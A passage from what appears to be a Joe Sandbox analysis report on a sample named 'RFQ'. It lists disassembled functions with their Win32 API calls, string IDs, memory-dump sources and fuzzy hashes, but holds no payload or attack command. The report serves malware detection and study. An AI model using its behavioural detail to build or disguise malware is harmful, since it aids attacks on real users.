                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00774F70
                                                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00774FB6
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00774FCA
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00774FEB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4176008265-0
                                                                                                                                                    • Opcode ID: 495e8d5747257f854d066730bc597cf2ec0e3e797dd099128636f71d570a35e2
                                                                                                                                                    • Instruction ID: 337e344347640d2f920825059c270b994e7773cf47af7f2aa5110759590d13be
                                                                                                                                                    • Opcode Fuzzy Hash: 495e8d5747257f854d066730bc597cf2ec0e3e797dd099128636f71d570a35e2
                                                                                                                                                    • Instruction Fuzzy Hash: 6F61AF71A00249EFDF21CFA4D888EBE7BB8FB05388F188559F409A3251D779AD15CB20
                                                                                                                                                    Function 00799C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00799C98
                                                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00799C9B
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00799CBF
                                                                                                                                                    • _memset.LIBCMT ref: 00799CD0
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00799CE2
                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00799D5A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 830647256-0
                                                                                                                                                    • Opcode ID: 97b6eed4a13df6529906f7e287bb99029245842e271fe20d86405c388d6fb3e2
                                                                                                                                                    • Instruction ID: 0856ec2a1b78b56e0a4db789791182c71e6e3c354132dd50e9d9ed5f3cf38cec
                                                                                                                                                    • Opcode Fuzzy Hash: 97b6eed4a13df6529906f7e287bb99029245842e271fe20d86405c388d6fb3e2
                                                                                                                                                    • Instruction Fuzzy Hash: 5E615975A00208EFEB20DFA8DC81EEE77B8EB09714F144199FA14E7291D778AD41DB60
                                                                                                                                                    Function 007694E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 007694FE
                                                                                                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00769549
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0076955B
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0076957B
                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 007695BE
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 007695D2
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 007695E7
                                                                                                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 007695F4
                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007695FD
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0076960F
                                                                                                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0076961A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2706829360-0
                                                                                                                                                    • Opcode ID: 98d63a420d5a182ed0c0801ca600b0635a3fa5b870de71921c7bf259fe9b7450
                                                                                                                                                    • Instruction ID: 4a6f05429a1492d187d67cbdfc71515d66813ce38b2da2ff90d050d7264e454d
                                                                                                                                                    • Opcode Fuzzy Hash: 98d63a420d5a182ed0c0801ca600b0635a3fa5b870de71921c7bf259fe9b7450
                                                                                                                                                    • Instruction Fuzzy Hash: D8413075900219EFCB11DFA4D848DDEBF79FF08354F108465E902A3251EB39AA45CBA5
                                                                                                                                                    Function 0078BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?~$|?~
                                                                                                                                                    • API String ID: 2862541840-2954734213
                                                                                                                                                    • Opcode ID: cea873e039101b6855273fd773c5883284ba60358d56583e16b03c99649903ed
                                                                                                                                                    • Instruction ID: c6448722d7791de2cfea772df72130ae41c27101f17085224c62b34a8ebe3fde
                                                                                                                                                    • Opcode Fuzzy Hash: cea873e039101b6855273fd773c5883284ba60358d56583e16b03c99649903ed
                                                                                                                                                    • Instruction Fuzzy Hash: FE91A171A40215EFDF24EFA5C848FAEBBB8EF45710F108559F515AB280D7789940CFA0
                                                                                                                                                    Function 0078ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • CoInitialize.OLE32 ref: 0078ADF6
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0078AE01
                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,007BD8FC,?), ref: 0078AE61
                                                                                                                                                    • IIDFromString.OLE32(?,?), ref: 0078AED4
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0078AF6E
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0078AFCF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                    • API String ID: 834269672-1287834457
                                                                                                                                                    • Opcode ID: 045edf75e5e86060046bb6b9a9f30f5fe2554dff82d0441efc67d8625b1d11f1
                                                                                                                                                    • Instruction ID: 655c18b438c5973b0d7ebb92244a45d35d633e069654bc55832f22cd7e838df0
                                                                                                                                                    • Opcode Fuzzy Hash: 045edf75e5e86060046bb6b9a9f30f5fe2554dff82d0441efc67d8625b1d11f1
                                                                                                                                                    • Instruction Fuzzy Hash: E261A070648301EFE720EF54C849F6AB7E8AF48714F10491AFA859B291D778ED44CB93
                                                                                                                                                    Function 00788107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00788168
                                                                                                                                                    • inet_addr.WSOCK32(?,?,?), ref: 007881AD
                                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 007881B9
                                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 007881C7
                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00788237
                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0078824D
                                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007882C2
                                                                                                                                                    • WSACleanup.WSOCK32 ref: 007882C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                    • String ID: Ping
                                                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                                                    • Opcode ID: 4a78ea5345c8bfff99154630dc1b236ca90eb240f07ec6587c4f4b72a8975b94
                                                                                                                                                    • Instruction ID: 779fb0a7140f91c318ed94d4d800c0aa4015411d0016c2ca78f0e608d5c3ac10
                                                                                                                                                    • Opcode Fuzzy Hash: 4a78ea5345c8bfff99154630dc1b236ca90eb240f07ec6587c4f4b72a8975b94
                                                                                                                                                    • Instruction Fuzzy Hash: 47519F316446049FD761AF24CC89F6AB7E4BF48320F448929FA55DB2A1DF78ED01CB42
                                                                                                                                                    Function 0077E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0077E396
                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0077E40C
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0077E416
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0077E483
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                                    • Opcode ID: 9d4db19e0d5ad6db43ac53d6e1bf9850a6c43df0e71d17adacf4174e85e032e9
                                                                                                                                                    • Instruction ID: f7ce6f7cc8f60c28aee129c4e27407b1ddc54a448eab2ccc39b13be98d73db47
                                                                                                                                                    • Opcode Fuzzy Hash: 9d4db19e0d5ad6db43ac53d6e1bf9850a6c43df0e71d17adacf4174e85e032e9
                                                                                                                                                    • Instruction Fuzzy Hash: CB318175A00249EFDF11EB68C849EADB7B8EF0C344F14C0A5F509AB292D678DA01CB91
                                                                                                                                                    Function 0076B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0076B98C
                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 0076B997
                                                                                                                                                    • GetParent.USER32 ref: 0076B9B3
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0076B9B6
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0076B9BF
                                                                                                                                                    • GetParent.USER32(?), ref: 0076B9DB
                                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0076B9DE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CtrlParent
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 1383977212-1403004172
                                                                                                                                                    • Opcode ID: 7a2220549e66adbb508c7271027fa99b2db5724e112dc57e8ed70de187e2d8f3
                                                                                                                                                    • Instruction ID: 65782baffae4edad500bf886bdcffda6214df79f1dc3bf5d5cd92dd247d770b5
                                                                                                                                                    • Opcode Fuzzy Hash: 7a2220549e66adbb508c7271027fa99b2db5724e112dc57e8ed70de187e2d8f3
                                                                                                                                                    • Instruction Fuzzy Hash: 0E21A4B4A00204EFDB05ABA4CC95EFEB775EF4A300F104115F952A3292DB7D58569B24
                                                                                                                                                    Function 0076B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0076BA73
                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 0076BA7E
                                                                                                                                                    • GetParent.USER32 ref: 0076BA9A
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0076BA9D
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0076BAA6
                                                                                                                                                    • GetParent.USER32(?), ref: 0076BAC2
                                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0076BAC5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CtrlParent
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 1383977212-1403004172
                                                                                                                                                    • Opcode ID: a2a37dfccad6c7bc4d72803c10e6fed1df8a5956367e2ac98ac6651a52242547
                                                                                                                                                    • Instruction ID: ab3cc73e42a27749f7d6ded1503008d5474be6ecf2e91cd7dbd603061c1fa387
                                                                                                                                                    • Opcode Fuzzy Hash: a2a37dfccad6c7bc4d72803c10e6fed1df8a5956367e2ac98ac6651a52242547
                                                                                                                                                    • Instruction Fuzzy Hash: A421B3B4A40108BFDB11ABA4CC85FFEB779EF49300F108115F952E3192EB7D59599B24
                                                                                                                                                    Function 0076BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32 ref: 0076BAE3
                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 0076BAF8
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0076BB0A
                                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0076BB85
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                    • API String ID: 1704125052-3381328864
                                                                                                                                                    • Opcode ID: 62d108063e562abc9e1f517958db975081d0f4122312122b172025b31cb651a5
                                                                                                                                                    • Instruction ID: 78736418115a62532ac352d2d8f0fe5bcf66c840710549b413b367222decfcf3
                                                                                                                                                    • Opcode Fuzzy Hash: 62d108063e562abc9e1f517958db975081d0f4122312122b172025b31cb651a5
                                                                                                                                                    • Instruction Fuzzy Hash: 851136F6608343F9FA206635EC0BDE6379D8B16324B204036FD0AE00D6FFAD6CA14554
                                                                                                                                                    Function 0078B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0078B2D5
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0078B302
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0078B30C
                                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0078B40C
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0078B539
                                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0078B56D
                                                                                                                                                    • CoGetObject.OLE32(?,00000000,007BD91C,?), ref: 0078B590
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 0078B5A3
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0078B623
                                                                                                                                                    • VariantClear.OLEAUT32(007BD91C), ref: 0078B633
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2395222682-0
                                                                                                                                                    • Opcode ID: 43719bcd4343a6aa8ede2462382f1df39bb4c1ab3355a14441222357840bfec1
                                                                                                                                                    • Instruction ID: 02184ca3f8bbfd31fe5590c3c3b17db3fa93c8bc4489b95c3efe4b4fe4a50c46
                                                                                                                                                    • Opcode Fuzzy Hash: 43719bcd4343a6aa8ede2462382f1df39bb4c1ab3355a14441222357840bfec1
                                                                                                                                                    • Instruction Fuzzy Hash: 79C113B1608305AFD710EF64C884A2BB7E9FF88304F00491DF98A9B251DB79ED05CB52
                                                                                                                                                    Function 0075ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __lock.LIBCMT ref: 0075ACC1
                                                                                                                                                      • Part of subcall function 00757CF4: __mtinitlocknum.LIBCMT ref: 00757D06
                                                                                                                                                      • Part of subcall function 00757CF4: EnterCriticalSection.KERNEL32(00000000,?,00757ADD,0000000D), ref: 00757D1F
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 0075ACD2
                                                                                                                                                      • Part of subcall function 00756986: __calloc_impl.LIBCMT ref: 00756995
                                                                                                                                                      • Part of subcall function 00756986: Sleep.KERNEL32(00000000,000003BC,0074F507,?,0000000E), ref: 007569AC
                                                                                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0075ACED
                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,007E6E28,00000064,00755E91,007E6C70,00000014), ref: 0075AD46
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 0075AD91
                                                                                                                                                    • GetFileType.KERNEL32(00000001), ref: 0075ADD8
                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0075AE11
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1426640281-0
                                                                                                                                                    • Opcode ID: 6d458c507cc7c979b90d157fa7bdab5555998a0266c66afd6279c1ee5ee3afc5
                                                                                                                                                    • Instruction ID: d8587184d68ab8741e2fe4eab4e0f88ae4133e23e9f17eb69ec14458c07c1bd6
                                                                                                                                                    • Opcode Fuzzy Hash: 6d458c507cc7c979b90d157fa7bdab5555998a0266c66afd6279c1ee5ee3afc5
                                                                                                                                                    • Instruction Fuzzy Hash: DB81F2709053459FDB24CF68C8455E9BBF0AF09322B24836DD8A6AB3D2D7BC9807CB55
                                                                                                                                                    Function 00774025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00774047
                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007730A5,?,00000001), ref: 0077405B
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00774062
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007730A5,?,00000001), ref: 00774071
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00774083
